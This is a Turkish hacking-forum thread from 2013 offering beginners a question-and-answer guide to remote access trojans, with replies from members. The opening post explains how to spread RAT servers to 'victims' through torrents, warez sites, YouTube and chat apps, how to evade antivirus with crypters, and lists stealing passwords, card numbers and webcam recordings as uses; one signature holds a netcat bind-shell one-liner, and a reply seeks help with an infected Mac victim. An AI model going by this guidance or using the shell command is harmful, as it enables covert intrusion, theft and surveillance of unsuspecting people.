İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

RAT Yenilere -Soru Cevap Şeklinde.

20-10-2013 16:39
#1
DarkPasha - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2013
Nereden:
Microsoft®
Mesajlar:
430
Teşekkür (Etti):
2
Teşekkür (Aldı):
125
Konular:
141
Ticaret:
(0) %
Soru-RAT Nedir?
Cevap-Rat aynı zamanda Remote Administrator Tool(Uzaktan Admin Olarak Kontrol) Olarak Adlandırılır.Genel olarak Kötü Amaçlı Kullanılır,Yani bilgisiyar kullanır gibi,Kişilerin bilgilerini çalmak,dosyalarını düzenlemek ve silmek gibi yönlerde kullanılabilir.Kurban bulmak için server dosyanızı karşı tarafa gönderip açmasını sağlamaktır.

Soru–
Spread Nasıl Yapılır?[Yaymak]
Cevap-RAT Servarlarınızı bir çok yol ile yayabilirsiniz.Aşşağıda belirteceğim yollar ile kurban kasabilirsiniz.
-P2P(PerToPer) Yani uTorrent,Pirate Bay Gibi çeşitli yollarla.
-Anlık Sohbet Alanı İçerisinde Yapılabilir Örneğin;
-Skype ,MSN, Aim Ve bir çok anlık görüşme yapabildiğiniz uygulamalar.



Soru - Kurban'ı Nasıl Control Ederim?
Cevap -Rat'ın Bilgisayarınızda kurulu olması gerekiyor.Rat client'i ile kurbanlarınızı kontrol edebilirsiniz.

Soru – RAT Kurmak İçin Ne Gerekli?
Cevap - Evet size Windows OS Sistemi Gereklidir,Tabikide Rat da kullanacağınız Port Modeminizin ara yüzüne girip açılması gereklidir.Google'da PortForwarding diye aratıp Modeminizi seçtikten sonra uygulamarı yaparak Portlarınızı açabilirsiniz.

Soru – Nasıl Port Açarım?
Cevap-Port açmak çok basittir ama RAT için çok önemlidir,Çünkü RAT'ın mantığı port üzerinedir,Rat port aracılığı ile bağlantı kurar ve firewall'ı bypass eder ve bağlantı kurulur.

Eğer port açmakta sıkıntı yaşayan olursa ÖM Atmaları Yeterli Olur Elimden Geldiğince Yardımcı Olabilirim.


Soru – Server'ımı Nasıl FUD Yaparım?
Cevap - Eğer Fud Server yapmak istiyorsanız,Sitemizin Crypter Bölümünde sürekli paylaşılan güncel fud crypterlar ile fud layabilirsiniz.Aynı Zamanda HackerToolv2(v3 yakında çıkacak) programı yardımıyla serverınızda hex editlemeleri yapıp kendinizi geliştirebilir ve fud yapabilirsiniz.


Soru – Kendi server'ımı açtım Nasıl Temizlerim?
Cevap -Öncelike Bağlantı aldıysanız eğer RAT'dan kendi bağlantınızı "uninstall" edebilirsiniz,Başka bir çözüm yolu ise Malware Anti Bytes , ve Anti Malware Programını kullanmaktır.
Kökten Çözüm ise Regedit'den Serverınızı silmektir.Bu işlemi yaparken görev yöneticisinden explorer.exe yi tamamen sonlandırmanız gerekiyor.


Soru –Yasal mı Değilmi?
Cevap - Evet bazı Rat lar yasal bazıları ise yasal değildir.Legal Ratlarda backdoor olmaz ve kişiler istedikleri zaman bağlantıyı kesebilirler ÖRN: TeamViewer .Yasal Olmayan ratlar genelde hack ve bilgi çalma işlerinde kullanılır.

Yasal Olanlar:
TeamViewer– Herhangi bir bilgisayara karşı tarafın izni ile kontrol edebilme.
UltraVNC – Uzaktan Destek İstek karşılığında kontrol yazılımıdır..
Ammyy Admin – Ammyy admin en çok güvenilir uzaktan kontrol yazılımıdır.Uzaktan yardım edebilir ve yönetebilirsiniz.
Mikogo – Mikogo online toplantı amacıyla kullanılabilir, Web Konferans & Uzaktan Kontrol Araçları. Ekranınızı aynı anda 10 kişi ile paylaşabileceğiniz bir yazılımdır.
Bu tarz programların yasal olma nedeni ise,Yapılacak kontrolün 2 kişi tarafından onaylanıp açılmasıdır.Bu yüzden herhangi bir olumsuz durum yoktur.

Yasal Olmayanlar:
Spy-Net
Cerberus Rat
CyberGate Rat
SubSeven
Turkojan
ProRat
DarkComet Rat

Neden Yasal Değil?
Yukarıdaki sorularda açıladığım gibi,Bu tarz programlar karşı tarafta port açar ve bu şekilde bağlantı kurulur,siz bunu yaptığınızda karşı tarafın ruhu duymaz ve insanların kişisel bilgilerine,şifrelerine,vs vs .İzinsiz ulaştığınızdan dolayı yasallıktan çıkar ve Illegal bir hal alır.

Soru – Nerde Ve Nasıl Server'ımı Yayarım?
Cevap– Yaymak için bir çok yol var.Bunlardan bir tanesi warez websiteleri, P2P Torrent Siteleri(uTorrent, Pirate bay), YouTube Gibi. Evet bir çok kişi spreadi otomatik programlarla yaparlar auto-spread gibi programlarla.Ama bu işin en verimli olacağı hal,Serverınızın fud olmasıdır.


Soru – DNS Host Nedir? (DOMAIN NAME SYSTEM)
Cevap - DNS,Domain Name System’in kısaltılmış şeklidir. Türkçe karşılığı ise Alan İsimlendirme Sistemi olarak bilinir.

DNS, 256 karaktere kadar büyüyebilen host isimlerini IP’ye çevirmek için kullanılan bir sistemdir. Host ismi,tümüyle tanımlanmış isim (full qualified name) olarak da bilinir ve hem bilgisayarın ismini hem de bilgisayarın bulunduğu Internet domainini gösterir. Örneğin murat.anadolu.com.tr ismi. Bu isimde ’anadolu.com.tr’ ifadesi internet domainini, ’murat’ ifadesi ise bu domaindeki tek bir makineyi belirtir. DNS , verilen bir makina adının IP adresini çözerek makinaların Internet üzerinde host isimleri ile haberleşmelerine olanak tanır.

DNS’in amacı nedir?

DNS, kolay anlaşılabilir ve kullanılabilir makine ve alan isimleri ile makine IP adresleri arasında çift taraflı dönüşümü sağlar. IP adreslerinin gündelik hayatta kullanımı ve hatırlanması pek pratik olmadığı için domain isimlendirme sistemi kullanılır. Ana amacı, ağ uzerinden gelen alan adı veya IPnumarası ile ilgili sorgulamalara yanıt vermektir. Bu amaç için cok yaygın olarak \\”Berkeley Internet Name Domain (BIND)\\” yazılımı kullanılmaktadır. Siz bir siteye erişmek istediğinizde, DNS sayesinde hangi site nerde , hangi IP hangi bilğisayara ait olduğu belirlenir, ve istediğiniz yere erişirsiniz.


Soru – RAT ile neler yapabilirim?
Cevap – Yapabileceklerinizin Listesi:
• Dosya Yönetimi
• Web tarayıcısı Kontrolü(Site Açtırma,Başlangıç Sitesini Değiştirmek.)
• Sistem bilgilerini alma(OS Versiyon,Hangi Antiyi Kullanıyor?, Ram Memory,Bilgisayar ismi Gibi.)
• Şifreleri alma, kredi kart numaralarını almak veya özel bilgileri almak.
• Bilgisayar ekran görüntüsünü görmek ve kontrol edebilme.
• Kamera Ve Ses Kaydı Yaoabilme
• Mouse kontrolü
• Silme, Değiştirme,İndirme, Yükleme veya dosyaların yerini değiştirme gibi.
Kullanıcı İmzası
# _DarkPasha_# = Online

Unutulmak istemiyorsan ; Ya okunacak şeyler yaz ya da yazılmaya değer şeyler yap.

Konu DarkPasha tarafından (26-10-2013 03:09 Saat 03:09 ) değiştirilmiştir.
azda22, oney31 Teşekkür etti.

25-10-2013 18:59
#2
musti0120 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Mesajlar:
185
Teşekkür (Etti):
72
Teşekkür (Aldı):
1
Konular:
41
Ticaret:
(0) %
ben port acamıyorum bi yardımcı olurmsn tp lik td854w
25-10-2013 19:00
#3
Trinty - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2013
Nereden:
Bileceksiniz
Yaş:
24
Mesajlar:
1.303
Teşekkür (Etti):
147
Teşekkür (Aldı):
252
Konular:
100
Ticaret:
(0) %
Eline sağlık darkcomet yasalmı ?
Kullanıcı İmzası
Yazacak bişe bulamadım
yakamoz9898 Teşekkür etti.
25-10-2013 21:10
#4
db43 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Nereden:
root@db43
Mesajlar:
807
Teşekkür (Etti):
13
Teşekkür (Aldı):
113
Konular:
51
Ticaret:
(0) %
Port açmakla firewall'ı bypass etmenin arasında bir bağlantı yok nasıl web server 80'inci portu kullanıyorsa RAT da o portu kullanıyor.Bypass etmenin asıl mantığı saldırganın bilgisayarının değil kurbanın bilgisayarının bağlantıyı kurmasıdır.
Kullanıcı İmzası
Linux İşletim Sistemi-Backtrack-Kali Linux Dersleri

Electronics - Communication Eng.

Kod:
192.168.1.1 ; mkfifo /tmp/pipe ; sh /tmp/pipe | nc -l 4444 > /tmp/pipe
$nc xxx.xxx.xxx.xxx 4444
25-10-2013 22:13
#5
Üyelik tarihi:
09/2012
Nereden:
İstanbul
Yaş:
43
Mesajlar:
2.056
Teşekkür (Etti):
174
Teşekkür (Aldı):
208
Konular:
44
Ticaret:
(0) %
darkcomet'i unutmuşsun onu rattan saymıyonmu yoksa yaralı konu egitici ..
Kullanıcı İmzası
26-10-2013 03:10
#6
DarkPasha - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2013
Nereden:
Microsoft®
Mesajlar:
430
Teşekkür (Etti):
2
Teşekkür (Aldı):
125
Konular:
141
Ticaret:
(0) %
konumu okuyan birilerini bulmak güzel
Kullanıcı İmzası
# _DarkPasha_# = Online

Unutulmak istemiyorsan ; Ya okunacak şeyler yaz ya da yazılmaya değer şeyler yap.

26-10-2013 09:58
#7
Italo - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2013
Nereden:
Tahtalı Köy
Mesajlar:
229
Teşekkür (Etti):
4
Teşekkür (Aldı):
23
Konular:
35
Ticaret:
(0) %
(Yeniler İçin.) İyi Anlatım.
Kullanıcı İmzası
Bügün Küçük Uygulamalar Yarın Büyük İşletim Sistemleri!
Gönüllü Aranıyor.RpS_smile:
31-10-2013 07:19
#8
Üyelik tarihi:
11/2007
Nereden:
Paris
Mesajlar:
260
Teşekkür (Etti):
69
Teşekkür (Aldı):
18
Konular:
38
Ticaret:
(0) %
Teşekurler eline saglık
25-06-2015 10:05
#9
hykocanm - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2015
Mesajlar:
10
Teşekkür (Etti):
4
Teşekkür (Aldı):
0
Konular:
2
Ticaret:
(0) %
Merhabalar ben çok enteresan bir olayla ile karşılaştım programım sorunsuz calısmakta fud vs herşeyim tastamam fakat kurbanımın bilgisayarının işletim sistemi mac. cıktı bu durumda ne yapmam gerek ?
25-06-2015 10:44
#10
Üyelik tarihi:
06/2015
Mesajlar:
9
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Konular:
0
Ticaret:
(0) %
teşekkürler

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı